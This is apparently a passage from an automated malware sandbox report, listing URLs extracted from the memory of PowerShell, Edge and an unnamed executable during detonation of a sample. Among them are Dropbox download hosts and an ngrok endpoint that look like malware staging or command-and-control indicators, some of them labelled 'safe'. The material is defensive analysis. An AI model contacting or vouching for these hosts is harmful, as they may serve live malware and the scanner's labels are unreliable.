                                                                                      https://login.yahoo.com/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.dropbox.com/playlist/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://issuetracker.google.com/255411748msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://onedrive.live.com/pickerpowershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://anglebug.com/7246msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.dropbox.compowershell.exe, 00000004.00000002.1571110372.000002058042B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54DEEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://anglebug.com/7369msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1571110372.0000020580226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://anglebug.com/7489msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1571110372.0000020580226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://chrome.google.com/webstoremsedge.exe, 0000001C.00000002.1661368153.000021C400188000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://contoso.com/Iconpowershell.exe, 00000004.00000002.1595037005.0000020590074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://crl.ver)svchost.exe, 00000007.00000002.2562589476.000002ACDD000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.compowershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://issuetracker.google.com/161903006msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1571110372.0000020580226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://docs.sandbox.google.com/document/fsip/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://anglebug.com/3078msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://anglebug.com/7553msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://anglebug.com/5375msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.compowershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://anglebug.com/5371msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://anglebug.com/4722msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://permanently-removed.invalid/msedge.exe, 00000006.00000002.1480775951.00002DF4023CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1571110372.000002058042B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://permanently-removed.invalid/LogoutYxABmsedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://www.google.com/recaptcha/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://permanently-removed.invalid/embedded/setup/chrome/usermenumsedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://anglebug.com/7556msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://chromewebstore.google.com/msedge.exe, 00000006.00000002.1480015007.00002DF40221C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.1661368153.000021C400188000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://dl-web.dropbox.com/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://app.hellofax.com/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://cfl.dropboxstatic.com/static/powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.macromedia.com/support/flashplayer/sys/1061714629.exe, 1061714629.exe, 00000022.00000000.1884738156.000000000053D000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.compowershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://anglebug.com/6692msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://issuetracker.google.com/258207403msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://%shttp://a.SharedObject.BadPersistencependingSharedObject.UriMismatch1061714629.exe, 0000001F.00000002.1934052501.0000000002520000.00000004.00001000.00020000.00000000.sdmp, 1061714629.exe, 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmp, 1061714629.exe, 0000001F.00000000.1711603757.000000000053D000.00000002.00000001.01000000.00000010.sdmp, 1061714629.exe, 00000022.00000000.1884738156.000000000053D000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://anglebug.com/3502msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://anglebug.com/3623msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.hellofax.com/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://anglebug.com/3625msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://designerapp-int.azurewebsites.net/msedge.exe, 00000006.00000002.1480775951.00002DF4023CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://anglebug.com/3624msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://anglebug.com/5007msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/3862msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://permanently-removed.invalid/embedded/setup/v2/chromeosmsedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://anglebug.com/4836msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://issuetracker.google.com/issues/166475273msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://instructorledlearning.dropboxbusiness.com/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef-UseBapowershell.exe, 00000004.00000002.1600292188.00000205EED20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1598322164.00000205EEAA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1598322164.00000205EE9F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1599840392.00000205EEC20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1600433064.00000205F0817000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://www.dropbox.com/pithos/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://sales.dropboxbusiness.com/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://msn.com/msedge.exe, 0000001C.00000002.1661642520.000021C400300000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://anglebug.com/4384msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://a.sprig.com/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://anglebug.com/3970msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
